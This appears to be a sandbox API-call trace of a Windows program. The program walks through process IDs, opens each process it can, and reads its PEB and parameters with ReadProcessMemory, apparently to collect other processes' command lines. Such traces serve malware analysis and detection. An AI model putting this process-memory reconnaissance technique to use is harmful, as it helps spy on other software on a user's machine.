[0564.235] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="272") returned 3
[0564.236] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.236] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x0
[0564.251] CloseHandle (hObject=0x0) returned 0
[0564.252] _ui64tow (_Value=0x15c, _Buffer="272", _Radix=10) returned="348"
[0564.255] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="348") returned 3
[0564.256] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.256] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x0
[0564.272] CloseHandle (hObject=0x0) returned 0
[0564.272] _ui64tow (_Value=0x180, _Buffer="348", _Radix=10) returned="384"
[0564.275] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="384") returned 3
[0564.276] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.276] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.288] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0
[0564.288] CloseHandle (hObject=0x0) returned 0
[0564.288] _ui64tow (_Value=0x18c, _Buffer="384", _Radix=10) returned="396"
[0564.297] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="396") returned 3
[0564.297] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.297] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.313] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
[0564.313] CloseHandle (hObject=0x0) returned 0
[0564.314] _ui64tow (_Value=0x1b4, _Buffer="396", _Radix=10) returned="436"
[0564.317] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="436") returned 3
[0564.318] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.318] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b4) returned 0x0
[0564.332] CloseHandle (hObject=0x0) returned 0
[0564.333] _ui64tow (_Value=0x1d0, _Buffer="436", _Radix=10) returned="464"
[0564.336] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="464") returned 3
[0564.337] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.337] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.352] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0
[0564.352] CloseHandle (hObject=0x0) returned 0
[0564.353] _ui64tow (_Value=0x1dc, _Buffer="464", _Radix=10) returned="476"
[0564.356] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="476") returned 3
[0564.357] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.357] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.374] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0
[0564.374] CloseHandle (hObject=0x0) returned 0
[0564.375] _ui64tow (_Value=0x1e4, _Buffer="476", _Radix=10) returned="484"
[0564.378] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="484") returned 3
[0564.378] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.378] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0
[0564.400] CloseHandle (hObject=0x0) returned 0
[0564.401] _ui64tow (_Value=0x260, _Buffer="484", _Radix=10) returned="608"
[0564.404] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="608") returned 3
[0564.405] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.405] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x260) returned 0x0
[0564.426] CloseHandle (hObject=0x0) returned 0
[0564.429] _ui64tow (_Value=0x2a0, _Buffer="608", _Radix=10) returned="672"
[0564.433] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="672") returned 3
[0564.434] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.434] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.495] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a0) returned 0x0
[0564.495] CloseHandle (hObject=0x0) returned 0
[0564.496] _ui64tow (_Value=0x2d0, _Buffer="672", _Radix=10) returned="720"
[0564.500] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="720") returned 3
[0564.500] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.501] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d0) returned 0x0
[0564.517] CloseHandle (hObject=0x0) returned 0
[0564.518] _ui64tow (_Value=0x348, _Buffer="720", _Radix=10) returned="840"
[0564.521] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="840") returned 3
[0564.522] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.522] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x348) returned 0x0
[0564.536] CloseHandle (hObject=0x0) returned 0
[0564.536] _ui64tow (_Value=0x370, _Buffer="840", _Radix=10) returned="880"
[0564.538] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="880") returned 3
[0564.538] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.539] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.550] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0
[0564.550] CloseHandle (hObject=0x0) returned 0
[0564.550] _ui64tow (_Value=0x3ac, _Buffer="880", _Radix=10) returned="940"
[0564.552] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="940") returned 3
[0564.553] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.553] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.564] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0
[0564.564] CloseHandle (hObject=0x0) returned 0
[0564.564] _ui64tow (_Value=0x120, _Buffer="940", _Radix=10) returned="288"
[0564.566] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="288") returned 3
[0564.567] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.567] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x120) returned 0x0
[0564.580] CloseHandle (hObject=0x0) returned 0
[0564.581] _ui64tow (_Value=0x164, _Buffer="288", _Radix=10) returned="356"
[0564.584] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="356") returned 3
[0564.585] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.585] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x1e8
[0564.602] GetLastError () returned 0x0
[0564.602] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.602] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd6018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2227f0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.603] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x222688, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.604] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.605] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd6020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x221e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.605] malloc (_Size=0x3e) returned 0x3ed180
[0564.605] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2226c0, lpBuffer=0x3ed180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ed180*, lpNumberOfBytesRead=0x0) returned 1
[0564.606] free (_Block=0x3ed180)
[0564.607] CloseHandle (hObject=0x1e8) returned 1
[0564.607] _ui64tow (_Value=0x420, _Buffer="356", _Radix=10) returned="1056"
[0564.610] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1056") returned 4
[0564.611] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.611] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x420) returned 0x0
[0564.624] CloseHandle (hObject=0x0) returned 0
[0564.625] _ui64tow (_Value=0x484, _Buffer="1056", _Radix=10) returned="1156"
[0564.628] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1156") returned 4
[0564.629] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.629] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x484) returned 0x0
[0564.641] CloseHandle (hObject=0x0) returned 0
[0564.641] _ui64tow (_Value=0x4a4, _Buffer="1156", _Radix=10) returned="1188"
[0564.643] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1188") returned 4
[0564.644] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.644] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.659] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a4) returned 0x1e8
[0564.659] GetLastError () returned 0x0
[0564.659] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffde018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a27c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.659] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a2688, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.660] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.660] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.660] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffde020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.660] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a1e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.661] malloc (_Size=0x20) returned 0x3efcf0
[0564.661] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2a26ca, lpBuffer=0x3efcf0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efcf0*, lpNumberOfBytesRead=0x0) returned 1
[0564.662] free (_Block=0x3efcf0)
[0564.662] CloseHandle (hObject=0x1e8) returned 1
[0564.663] _ui64tow (_Value=0x4bc, _Buffer="1188", _Radix=10) returned="1212"
[0564.666] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1212") returned 4
[0564.666] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.666] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.682] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0
[0564.682] CloseHandle (hObject=0x0) returned 0
[0564.682] _ui64tow (_Value=0x4fc, _Buffer="1212", _Radix=10) returned="1276"
[0564.685] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1276") returned 4
[0564.686] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.686] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1e8
[0564.701] GetLastError () returned 0x0
[0564.701] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.701] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd9018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2728b0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.702] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x272688, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.703] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.703] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd9020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x271e60, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.704] malloc (_Size=0x116) returned 0x401d40
[0564.704] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2726c8, lpBuffer=0x401d40, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.705] free (_Block=0x401d40)
[0564.705] CloseHandle (hObject=0x1e8) returned 1
[0564.706] _ui64tow (_Value=0x640, _Buffer="1276", _Radix=10) returned="1600"
[0564.709] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1600") returned 4
